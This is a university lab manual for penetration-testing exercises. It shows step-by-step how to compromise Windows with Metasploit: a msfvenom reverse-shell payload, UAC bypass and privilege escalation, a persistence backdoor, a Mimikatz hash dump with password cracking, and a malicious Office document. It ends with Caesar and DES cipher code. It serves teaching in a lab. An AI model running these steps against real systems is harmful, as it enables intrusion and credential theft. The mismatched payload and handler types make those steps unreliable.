Practical - Manual - BMSF

This document outlines practical exercises for exploiting Windows systems using Metasploit, focusing on creating and delivering payloads to gain Meterpreter sessions. It covers various techniques including privilege escalation, persistence, hash dumping with Mimikatz, and crafting malicious documents. The exercises emphasize the importance of cybersecurity and the need for continuous learning to protect against digital threats.


Enrolment No.

BMSF Laboratory


CSE- Page 1 of 55
Practical-5

Use msfvenom to exploit windows system and get the meterpreter session.

Description: This practical session focuses on the steps to exploit the Windows system and
get the meterpreter session. Meterpreter is an advanced, powerful payload within the
Metasploit Framework, specifically designed for exploitation and post-exploitation activities
during penetration testing and ethical hacking engagements.

Tools:

Virtual Machine: Use a virtual machine environment with Kali Linux and Metasploit
installed, for a controlled and safe learning environment.

Msfvenom: msfvenom is a versatile tool within the Metasploit Framework used for
generating payloads. Use this tool to create a custom payload.

Victim Machine: Use a Windows machine installed in a virtual machine as the victim machine.

Steps:

1. Create an exploit for the Windows machine using msfvenom

- Use the command: msfvenom -p windows/shell/reverse_tcp LHOST=<ip address of your attacker machine, i.e. Kali> LPORT=4040 -f exe > reward.exe

- Our payload will be generated and stored in the current working directory.

2. Setting up the meterpreter session

- We need to set up a listener on our attacker machine to receive the connection from the target machine. For that, use the following commands:
- use exploit/multi/handler: this opens a multi-handler in which the required parameters are set.


- Now we need to set the payload that the listener will use. For that, use the following command:

set payload windows/meterpreter/reverse_tcp

- We also need to set the local host.
- Use the command: set LHOST <ip address of attacker machine>
- Now we set LPORT, i.e. the local port on which we will listen for the victim machine.
- Use the command: set LPORT 4040
- Now we are done with the setup.
- Use the exploit command to start the handler.
- Here, the reverse TCP handler has started and is listening for the victim machine.


3. Delivery and execution of the payload

- To deliver our payload to the target system, we can use different delivery mechanisms.
- For this practical demo, we will use a Python web server to deliver our payload to the target system.
- Start the Python server in the same directory where our payload is saved. To run the Python server, use the command:

python3 -m http.server

- Now go to the victim machine and type the IP address and port number of the attacker machine in the form of a URL.
- It will list the contents of the served directory.
- Click on the payload file and download it.


- Execute the payload by double-clicking it and choosing the Run option.
- Now go to the attacker's machine; here, we have obtained a meterpreter session on the target machine.
- Check the present working directory of the target machine by typing the pwd command in meterpreter.
- Use the getuid command to get the user ID of the user on the target machine.


- We can also check the network configuration of the target system by using the ipconfig command.

Conclusion:

Through this practical exercise, we've successfully exploited a Windows system to gain
a Meterpreter session. This process enabled us to gather valuable information for our
practice. It highlights the critical importance of cybersecurity measures in protecting
systems against unauthorized access and underscores the need for continuous learning
and vigilance in the ever-evolving landscape of digital security threats.


Practical-6
Use already created meterpreter session to perform post exploitation.
Description:

During the post-exploitation phase of our practical exercise, we delved deeper into the
compromised Windows system to explore methods for escalating privileges and
establishing persistence. This phase is crucial in understanding how attackers can
maintain access and control over a compromised system, even after initial access has
been gained.

Privilege escalation:

Privilege escalation involves elevating the level of access or permissions on a system,
granting the attacker greater control and capabilities.

Persistence:

Persistence involves establishing mechanisms or backdoors to maintain access to a
compromised system over an extended period, even after system reboots or after security
measures are implemented.

Tools:

Virtual Machine: Use a virtual machine environment with Kali Linux and Metasploit
installed, for a controlled and safe learning environment.

Msfvenom: msfvenom is a versatile tool within the Metasploit Framework used for
generating payloads. Use this tool to create a custom payload.

Victim Machine: Use a Windows machine installed in a virtual machine as the victim machine.

Meterpreter: Meterpreter is a dynamically extensible payload that uses in-memory DLL
injection stagers and is extended over the network at runtime. It communicates over the
stager socket and provides a comprehensive client-side Ruby API. It features command
history, tab completion, channels, and more.

Steps:

1. Privilege escalation

- We have previously created a meterpreter session on the target system.
- Check the user ID of the logged-on user on the target system. For that, use the getuid command.


- The result shows that we have only user-level access on the target system, so we can perform only limited activities.
- To perform privileged activities, we need to escalate our privileges.
- To use another exploit to escalate privileges, we need to background this active session. Use the background command to send the active session to the background.
- Use the back command to exit from multi/handler.
- Now search for another exploit to bypass the UAC of the target system.
- For that, use the command: search exploit/windows/local/bypassuac
- Type use 2 to select the bypassuac module that has an excellent rank.
- Now use show options to see what we need to set.
- Type the following commands to set lhost, lport and session.


- We are done with the setup; run the module using the run command.
- Another session has opened; now check the user ID by using the getuid command.
- The output is the username only, which means we still have only user-level privileges on the target system.
- Use the getsystem command to get administrative access on the target system.
- Check the user ID again.
- Now the result is NT AUTHORITY\SYSTEM, which means we have administrative privileges on the target system.
- To confirm this, we can check the present working directory.
- We have access to the system32 directory, which confirms that we have admin-level access on the target system.

2. Persistence

- To obtain persistence on the target system, we need to use another module.
- For that, we need to background the active session. Use the background command to send this active session to the background.


- Use the back command to exit from the previous module.
- Before using any exploit on the target system, take a snapshot of the target system so that we can revert it later.
- To take a snapshot, navigate to Oracle VirtualBox and select the Take option.
- Now, on our attacker machine, search for the persistence module.
- Use the command: search exploit/windows/local/persistence_service
- Type use 0 to use this persistence_service module.
- Use the show options command to see the required settings.


- Here, we need to set another unused port for the persistence service.
- Also set the session option to session ID 2.
- Now run this module.
- After running it, a new meterpreter session has opened.
- Type the exit command, and check the active sessions by using the sessions command.
- Here, we have three active sessions.
- Now we will kill all these sessions to check persistence on the target system.
- Type the command sessions -K.
- Exit from these modules.
- Now go to the desktop and create a resource file using a text editor.


- Add all the essential commands to start the meterpreter listener.
- Save and exit the file.
- Within the same directory, use the command msfconsole -r <name of resource file>
- The above command executes all the commands present in the resource script, and we will get a meterpreter session if persistence was established on the target system. Otherwise, it will just open a new meterpreter listener.
- Here we have successfully obtained a meterpreter session on the target machine, which means persistence has been established on the target system.


Conclusion:

The post-exploitation phase of our practical exercise, which involved privilege
escalation and persistence techniques, has provided invaluable insights into the
vulnerabilities of the target system. Through meticulous analysis and execution of
various methods, we successfully demonstrated the potential for adversaries to escalate
privileges and establish persistence, thereby maintaining unauthorized access to the
compromised system.


Practical-7

Perform windows hash dump using mimikatz module in metasploit.


Description:

Performing a Windows hash dump using the Mimikatz module in Metasploit involves
leveraging the capabilities of both Mimikatz and Metasploit to extract password
hashes from a compromised Windows system.

Tools:

Virtual Machine: Use a virtual machine environment with Kali Linux and Metasploit
installed, for a controlled and safe learning environment.

Msfvenom: msfvenom is a versatile tool within the Metasploit Framework used for
generating payloads. Use this tool to create a custom payload.

Victim Machine: Use a Windows machine installed in a virtual machine as the victim machine.

Steps:

- We have a meterpreter session on the target machine.
- Use the getuid command to check the user ID of the user on the target machine.
- As per the result of the getuid command, we have only user-level access on the target system.
- To dump the hash values of the target system, we require admin-level access.
- To get admin access, we need to bypass the UAC of the target system.
- Use the background command to send this active session to the background.


- Now search for another exploit to bypass the UAC of the target system.
- For that, use the command: search exploit/windows/local/bypassuac
- Type use 2 to select the bypassuac module that has an excellent rank.
- Now use show options to see what we need to set.
- Type the following commands to set lhost, lport and session.
- We are done with the setup; run the module using the run command.
- Use the getsystem command to get administrative access on the target system.


- Check the user ID.
- We have the UID NT AUTHORITY\SYSTEM, which means we have admin access on the target system.
- To dump the hash values, we need to load the mimikatz module into the target session.
- Use the command: load mimikatz
- We have successfully loaded the mimikatz module on the target machine.
- It has loaded the kiwi extension on the target machine.
- Use the help command to see the other commands and their uses.


- Use the lsa_dump_sam command to dump the password hash values of all Windows users.
- Copy the hash value and save it in a new txt file.
- To brute force this hash we will use the John the Ripper tool.
- John the Ripper requires a wordlist to brute force this hash value; we will use the rockyou.txt wordlist present in Kali Linux.
- rockyou.txt is present in the /usr/share/wordlists directory.
- Copy rockyou.txt into your working directory.
- Now use the command shown in the diagram below to perform the brute force.


- If this hash was cracked before, it will give us an error as shown above.
- To see the cracked password, use the following command.
- Here, we successfully cracked the NTLM hash and got the Windows user's password.

Conclusion:

Performing a Windows hash dump using the Mimikatz module in Metasploit
provides a powerful means to extract password hashes from compromised
Windows systems during penetration testing or security assessments. By
leveraging the capabilities of Metasploit and Mimikatz, security professionals can
identify weak passwords, assess security posture, and strengthen defenses
against potential attacks.


Practical-8

1. Create a malicious .docx/.xlsx using Metasploit.

2. Use malicious .docx/.xlsx file to exploit windows system and gain the
meterpreter session.

Description:
In this practical demonstration, we showcase the threat posed by malicious documents by
crafting a .docx or .xlsx file embedded with a payload using Metasploit. Through social
engineering, we entice a user to open the file, triggering the payload execution upon opening.
This exploit establishes a reverse TCP connection back to our attacker machine, granting us a
Meterpreter session.

Tools:

Virtual Machine: Use a virtual machine environment with Kali Linux and Metasploit
installed, for a controlled and safe learning environment.

Meterpreter: Meterpreter is a dynamically extensible payload that uses in-memory DLL
injection stagers and is extended over the network at runtime. It communicates over the
stager socket and provides a comprehensive client-side Ruby API. It features command
history, tab completion, channels, and more.

Steps:

- Open msfconsole and search for office exploits.
- Choose an exploit. Here, we will use exploit number 30 from the search results.
- Use the show options command to see the required parameters.


- Set lport and the file name.
- Run the exploit using the run command.
- It will start a server and create the payload, i.e. the malicious document, in the /home/project/.msf4/local/ directory.
- Go to the victim machine and use the server address shown on the attacker machine.
- It will download the default.hta payload on the victim machine.


- Now, on the attacker machine, type the exit command to stop the server.
- Change the directory to the desktop and create a resource script using the nano editor with all the essential commands, as follows.
- Use this script with msfconsole as shown below.
- It will open a TCP handler.
- Run the payload on the victim machine.


- It will open a new meterpreter session.
- Now use various commands to gather information about the target system.

Conclusion:

By successfully executing the payload embedded within the document, we highlighted the
critical importance of identifying and addressing security flaws to prevent unauthorized
access and data breaches. This exercise serves as a valuable reminder of the necessity for
robust cybersecurity measures, proactive vulnerability management, and continuous testing to
bolster defences against potential threats. Through penetration testing and simulated attacks,
organizations can uncover weaknesses in their systems and implement targeted security
measures to mitigate risks effectively, ultimately enhancing overall resilience in the face of
cyber threats.


Practical-9
Implement the following private key cryptography algorithm:

1. Caesar Cipher

2. DES algorithm
Description:
In implementing the Caesar Cipher algorithm, we'll define functions for encryption and
decryption, shifting characters in the plaintext by a fixed number of positions. This will
illustrate basic substitution cipher principles. Similarly, for the DES algorithm, we'll create
functions for key generation, encryption, and decryption, following the DES algorithm's
permutation and substitution operations. These implementations will provide practical insight
into private key cryptography.

- Caesar Cipher:

The Caesar Cipher, also known as the shift cipher, is one of the simplest and most
widely known encryption techniques. It is a substitution cipher where each letter in
the plaintext is shifted a certain number of places down or up the alphabet.

- DES algorithm:

DES, the Data Encryption Standard, is a symmetric-key block cipher algorithm used for
encryption and decryption of electronic data. It was developed in the 1970s by IBM
and adopted as a standard by the National Institute of Standards and Technology
(NIST) in 1977. DES became widely used for securing electronic communications
and data transmission until it was eventually replaced by more secure algorithms
like AES (Advanced Encryption Standard). Its 56-bit key size is considered
insufficient for modern security standards due to advances in computing power and
cryptanalysis techniques.

Tools:

Anaconda Navigator:

Anaconda Navigator is a graphical user interface (GUI) included with the Anaconda
distribution for Python. It provides an easy-to-use interface to manage packages,
environments, and applications associated with Anaconda.

Jupyter Notebook:

Jupyter Notebook provides an interactive interface where you can create and edit notebooks.
Notebooks consist of cells that can contain code, Markdown text, equations, or raw text.


Steps:

1. Write Python code to implement the Caesar cipher.

Code:

- This code defines a function called caesar_cipher that performs Caesar cipher encryption on a given text input with a specified shift value.
- import tkinter as tk: imports the Tkinter module and aliases it as tk.
- def caesar_cipher(text, shift): defines the function caesar_cipher, which takes two parameters:
  - text: the text to be encrypted.
  - shift: the number of positions to shift each character in the text.
- encrypted_text = "": initializes an empty string to store the encrypted text.
- for char in text:: iterates over each character in the input text.
- if char.isalpha():: checks whether the character is a letter.
- shifted = ord(char) + shift: calculates the shifted value of the character by adding the shift value to its ASCII code.
- if char.islower():: checks whether the character is a lowercase letter.
- if shifted > ord('z'): shifted -= 26: if the shifted value exceeds the ASCII code for lowercase 'z', it wraps around by subtracting 26.
- if char.isupper():: checks whether the character is an uppercase letter.
- if shifted > ord('Z'): shifted -= 26: if the shifted value exceeds the ASCII code for uppercase 'Z', it wraps around by subtracting 26.
- encrypted_text += chr(shifted): converts the shifted ASCII code back to a character and appends it to the encrypted_text string.
- else: encrypted_text += char: if the character is not a letter (e.g., punctuation or whitespace), it is left unchanged and appended to encrypted_text.
- return encrypted_text: returns the encrypted text.
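As an added example (not the manual's own Tkinter code), the Caesar cipher described above implemented without the GUI. It uses modular arithmetic rather than the one-sided "if shifted > ord('z')" check, so that the negated shift used for decryption and shifts larger than 26 both wrap correctly; the function names caesar_cipher, encrypt_text and decrypt_text follow the manual, all_candidate_plaintexts is an addition.

```python
# Added example, not the manual's Tkinter code: the Caesar cipher described above,
# using modular arithmetic so that decryption with a negative shift (as the
# manual's decrypt_text() does) and shifts larger than 26 both wrap correctly.

ALPHABET_SIZE = 26


def caesar_cipher(text: str, shift: int) -> str:
    """Shift every ASCII letter by `shift` positions; leave other characters as they are."""
    result = []
    for char in text:
        # str.isalpha() is also true for non-ASCII letters such as 'é', which
        # have no place in a 26-letter alphabet, so restrict to ASCII letters.
        if char.isalpha() and char.isascii():
            base = ord('a') if char.islower() else ord('A')
            # (position + shift) mod 26 wraps past 'z' and, for negative
            # shifts, below 'a'; a one-sided "if shifted > ord('z')" check
            # would emit punctuation characters when decrypting.
            result.append(chr(base + (ord(char) - base + shift) % ALPHABET_SIZE))
        else:
            result.append(char)
    return "".join(result)


def encrypt_text(plaintext: str, shift: int) -> str:
    return caesar_cipher(plaintext, shift)


def decrypt_text(ciphertext: str, shift: int) -> str:
    # Decryption is encryption with the negated shift, as in the manual.
    return caesar_cipher(ciphertext, -shift)


def all_candidate_plaintexts(ciphertext: str) -> dict:
    """Map each of the 26 possible keys to the plaintext it yields.

    There are only 26 keys, so anyone holding the ciphertext can simply try
    them all and read off the one that looks like language: this is why the
    Caesar cipher is a teaching tool, not a protection mechanism."""
    return {k: decrypt_text(ciphertext, k) for k in range(ALPHABET_SIZE)}


if __name__ == "__main__":
    sample = "Hello, World!"                   # constructed sample input
    ct = encrypt_text(sample, 3)
    print(ct)                                  # Khoor, Zruog!
    print(decrypt_text(ct, 3))                 # Hello, World!
    print(all_candidate_plaintexts(ct)[3])     # Hello, World!
```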


- These functions are part of a GUI application using Tkinter for Caesar cipher encryption and decryption:
- encrypt_text(): encrypts the input text using a Caesar cipher with a user-specified shift value. It retrieves the input from a text widget, gets the shift value from another widget, calls the caesar_cipher() function, and displays the encrypted text in an output widget.
- decrypt_text(): decrypts the input text using a Caesar cipher with the negated shift value (to reverse the encryption). It performs the same steps as encrypt_text() but with a negated shift value.
- Both functions rely on the input entry and shift entry widgets for user input and on the output entry widget to display results.

- This code creates a Tkinter window for the Caesar Cipher application with the following components:
- A window with the title "Caesar Cipher".
- A label "Enter Text:" and a text entry widget (input_entry) for inputting text.
- A label "Shift Value:" and an entry widget (shift_entry) for specifying the shift value.
- The pack() method is used to display these widgets in the window in the order they are defined.


- This code adds buttons for encryption and decryption, as well as an output text entry field. The encrypt_button and decrypt_button widgets trigger the encrypt_text() and decrypt_text() functions when clicked, respectively. The output_entry widget displays the encrypted or decrypted text. Finally, window.mainloop() starts the Tkinter event loop, allowing the GUI to be interactive.

Output:

- Encryption


- Decryption

2. Write Python code to implement DES

Code:

This code creates a GUI application using Tkinter for encrypting and decrypting text using
the DES algorithm. It imports the necessary modules from tkinter and Cryptodome, defines
functions for encryption and decryption, and sets up the GUI layout with labels, entry fields,
and buttons for user interaction. When the user enters a key and plaintext and clicks the
"Encrypt" button, the plaintext is encrypted using DES and displayed as ciphertext. Clicking
the "Decrypt" button decrypts the ciphertext and displays the original plaintext. The code
then runs the Tkinter event loop to keep the GUI application running.


Output:

Conclusion:

This practical implementation presents two cryptographic algorithms, the Caesar
Cipher and the DES (Data Encryption Standard), within a Tkinter-based GUI
application. Users can input keys, plaintext, and shift values, then perform encryption
or decryption operations using either algorithm. The GUI interface provides a user-
friendly environment for interacting with the cryptographic functionalities, allowing
users to understand the concepts of substitution ciphers and symmetric-key block
ciphers. This practical exercise enhances understanding of basic cryptographic
principles and their application in software development for data security and
confidentiality.
